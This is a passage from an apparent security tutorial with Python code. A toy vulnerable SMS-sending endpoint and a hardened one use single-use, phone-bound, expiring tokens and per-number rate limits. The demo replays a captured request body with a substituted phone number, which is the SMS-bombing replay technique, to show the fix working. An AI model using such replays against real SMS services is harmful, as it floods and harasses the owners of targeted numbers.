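        self.issued[token] = (phone, now + self.ttl)
        return token

    def handle(self, body, now):
        f = parse_body(body)
        phone = f.get("email_phone", [""])[0]
        token = f.get("sms_token", [""])[0]     # assumed field name
        entry = self.issued.pop(token, None)    # pop = single use; a replay finds nothing
        if entry is None:
            return "unknown token"
        bound_phone, expiry = entry
        if now > expiry:
            return "token expired"
        if bound_phone != phone:
            return "token not for this number"
        recent = [t for t in self.sends.get(phone, []) if now - t < self.per_phone_window]
        if len(recent) >= self.per_phone_limit:
            return "rate limited"
        recent.append(now)
        self.sends[phone] = recent
        self.sent.append(phone)
        return "sent"


def demo():
    """Run both endpoints against the captured body and its replays."""
    vuln = VulnerableSmsEndpoint()
    vulnerable = [vuln.handle(CAPTURED_BODY),
                  vuln.handle(replay_with_phone(CAPTURED_BODY, "13900000001"))]

    hard, now, victim = HardenedSmsEndpoint(ttl=120, per_phone_limit=3), 1000.0, "13800000000"
    t1, t2, t3 = (hard.captcha_solved(victim, slider_ok=True, now=now) for _ in range(3))
    hardened = [
        hard.handle(CAPTURED_BODY + "&sms_token=" + t1, now + 1),                           # first use
        hard.handle(CAPTURED_BODY + "&sms_token=" + t1, now + 2),                           # straight replay
        hard.handle(replay_with_phone(CAPTURED_BODY + "&sms_token=" + t2, "13900000001"), now + 3),
        hard.handle(CAPTURED_BODY + "&sms_token=" + t3, now + hard.ttl + 1),                # too late
    ]
    for _ in range(3):  # fresh valid tokens, but the 4th SMS to one number is refused
        tok = hard.captcha_solved(victim, slider_ok=True, now=now + 10)
        hardened.append(hard.handle(CAPTURED_BODY + "&sms_token=" + tok, now + 11))
    return {"vulnerable": vulnerable, "hardened": hardened}
```

demo() returns "sent" twice for the vulnerable endpoint and, for the hardened one, "sent", "unknown token", "token not for this number", "token expired", two more "sent" and finally "rate limited". Storing the token server-side is the simplest form; a stateless variant would sign the phone number and expiry with an HMAC, but then single use still needs a server-side record of consumed tokens.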